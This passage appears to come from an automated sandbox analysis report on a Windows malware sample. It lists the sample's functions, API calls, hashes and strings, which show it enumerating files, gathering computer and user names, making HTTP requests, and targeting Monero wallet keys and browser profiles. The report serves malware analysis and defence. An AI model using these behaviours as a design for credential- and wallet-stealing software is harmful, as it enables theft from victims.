                            • Opcode Fuzzy Hash: d0d06a7378dce0694bc8c14865676403d6b362a0859928388ad0f440b26d3cc4
                            • Instruction Fuzzy Hash: F2F08270944209AFE744BBA0DD06BBD7B75FB14701F104719F913A11C1DBB15941D75B
                            Function 006747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 1311565b44eabd86b57eb82a471d909336b0ffb7cda8dd3e8e9deb80780a36b9
                            • Instruction ID: 576788a75f0ca1851a178555ad0e6a60f6558a6ba5977ed4f58aed218c64e90d
                            • Opcode Fuzzy Hash: 1311565b44eabd86b57eb82a471d909336b0ffb7cda8dd3e8e9deb80780a36b9
                            • Instruction Fuzzy Hash: 892130B1D00209ABDF14EFA4E94AADD7B75FB45310F108629F955A7280DB706609CB91
                            Function 006851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 00676280: InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                              • Part of subcall function 00676280: StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                              • Part of subcall function 00676280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                              • Part of subcall function 00676280: HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                              • Part of subcall function 00676280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                              • Part of subcall function 00676280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 0cfe1d21faa7c548fe12194b5e9753487868f05c8b32f5eb76e5ea0259be1a6f
                            • Instruction ID: 4b5ab677f5c959d905ac2a62e2660e518844e251107e11fc8302b407fb1faf5a
                            • Opcode Fuzzy Hash: 0cfe1d21faa7c548fe12194b5e9753487868f05c8b32f5eb76e5ea0259be1a6f
                            • Instruction Fuzzy Hash: 61113370900108A7EB58FFA4DD92AED737AAF50300F50825DFC1A5A592EF34AB06C796
                            Function 006878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0154f652654ce937b2d4ea855c437d8afb52aa5e93d62e33b80b57e948daf00a
                            • Instruction ID: 86437310b4b384b81b82d188497a4f95c1facab35608bf4e300994f68abf7bc2
                            • Opcode Fuzzy Hash: 0154f652654ce937b2d4ea855c437d8afb52aa5e93d62e33b80b57e948daf00a
                            • Instruction Fuzzy Hash: A60186B1904204EFCB14DF94DD45BAABBB8F704B21F104329F645E3680D37559448BA1
                            Function 00671110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0067112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00671132
                            • ExitProcess.KERNEL32 ref: 00671143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 9b596acb999e8c070630fae11c425e007e3ade297bff9abc6df885870a875a53
                            • Instruction ID: c097c0352f8a81cbe88decf00c05e89e44a3d0b2d86a9a48c4359cbc6d7886c6
                            • Opcode Fuzzy Hash: 9b596acb999e8c070630fae11c425e007e3ade297bff9abc6df885870a875a53
                            • Instruction Fuzzy Hash: 07E0867094530CFBE7146BA4DC0AB087778BB04B01F104155F7087A5C0CAB526009699
                            Function 006710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006710B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006710F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 2c02401388a88bf7452b1228c2fda4435bf7c23515dd0078eba1c71337d96e5b
                            • Instruction ID: 6d30a2bf4bc7abd741ecfb642946c7d71cfd98872ba505fdd166ccbc3b88d62f
                            • Opcode Fuzzy Hash: 2c02401388a88bf7452b1228c2fda4435bf7c23515dd0078eba1c71337d96e5b
                            • Instruction Fuzzy Hash: 69F0E271641308BBEB149AA8AC49FEEB7ECE705B15F304548F504E7280D9719E00CAA4
                            Function 00671190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                              • Part of subcall function 006878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                              • Part of subcall function 006878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                              • Part of subcall function 00687850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                              • Part of subcall function 00687850: RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                              • Part of subcall function 00687850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                            • ExitProcess.KERNEL32 ref: 006711C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 651e3ad9687aacb643840791475233ce9951de9babd8fd9abafd0e27b08b94a4
                            • Instruction ID: 1647e66dc855065e1c4a161b173d2db27ada8facc5f76f512942c65181ede998
                            • Opcode Fuzzy Hash: 651e3ad9687aacb643840791475233ce9951de9babd8fd9abafd0e27b08b94a4
                            • Instruction Fuzzy Hash: BAE08CA191420566CA4837F4AC0AB2A338E6B11345F440739BA0986242FE25E800876E

                            Non-executed Functions

                            Function 006838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006838CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006838E3
                            • lstrcat.KERNEL32(?,?), ref: 00683935
                            • StrCmpCA.SHLWAPI(?,00690F70), ref: 00683947
                            • StrCmpCA.SHLWAPI(?,00690F74), ref: 0068395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00683C67
                            • FindClose.KERNEL32(000000FF), ref: 00683C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 574b52fbf93e1a58cf1fd3e6ddb8f83dc7b5d2ce7ce1204db6d57e681c856dad
                            • Instruction ID: 75d993f2f8bc54d0476f954350c9aba167b3279046093e7a00f6025b0fbc78ce
                            • Opcode Fuzzy Hash: 574b52fbf93e1a58cf1fd3e6ddb8f83dc7b5d2ce7ce1204db6d57e681c856dad
                            • Instruction Fuzzy Hash: 3BA142B1900218AFDB64EFA4DC85FEE737DBB54700F044698E50D96241EB759B84CF62
                            Function 0067BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00690B32,00690B2B,00000000,?,?,?,006913F4,00690B2A), ref: 0067BEF5
                            • StrCmpCA.SHLWAPI(?,006913F8), ref: 0067BF4D
                            • StrCmpCA.SHLWAPI(?,006913FC), ref: 0067BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0067C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 02778efc478d1d48a6025e55e57bd80d1f189238a06215dbd0fd774473a96397
                            • Instruction ID: f42ce46037e94bbf1d3114bc93d44c240093d675b7b7590de8b6026b135ef158
                            • Opcode Fuzzy Hash: 02778efc478d1d48a6025e55e57bd80d1f189238a06215dbd0fd774473a96397
                            • Instruction Fuzzy Hash: 894267B19101045BDF58FBB0DD96EED737EAB44300F40865DFD0AA6181EE34AB49CBA6
                            Function 00684910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0068492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00684943
                            • StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                            • StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                            • FindClose.KERNEL32(000000FF), ref: 00684B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 324cc1d3f9d96b01d745438321724236bc2ce8491ab7db67d4279f345d8d55c5
                            • Instruction ID: 9d175668a36c24c2fb14ba3578913c051bbfa8af788dfb3873d88ee413470df2
                            • Opcode Fuzzy Hash: 324cc1d3f9d96b01d745438321724236bc2ce8491ab7db67d4279f345d8d55c5
                            • Instruction Fuzzy Hash: C46164B2900219ABDF24EBA0DC45EEA737DBB48700F04869CF60996141EF75EB85CF95
                            Function 00684570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00684580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00684587
                            • wsprintfA.USER32 ref: 006845A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006845BD
                            • StrCmpCA.SHLWAPI(?,00690FC4), ref: 006845EB
                            • StrCmpCA.SHLWAPI(?,00690FC8), ref: 00684601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068468B
                            • FindClose.KERNEL32(000000FF), ref: 006846A0
                            • lstrcat.KERNEL32(?,012BF510), ref: 006846C5
                            • lstrcat.KERNEL32(?,012BDEC0), ref: 006846D8
                            • lstrlen.KERNEL32(?), ref: 006846E5
                            • lstrlen.KERNEL32(?), ref: 006846F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
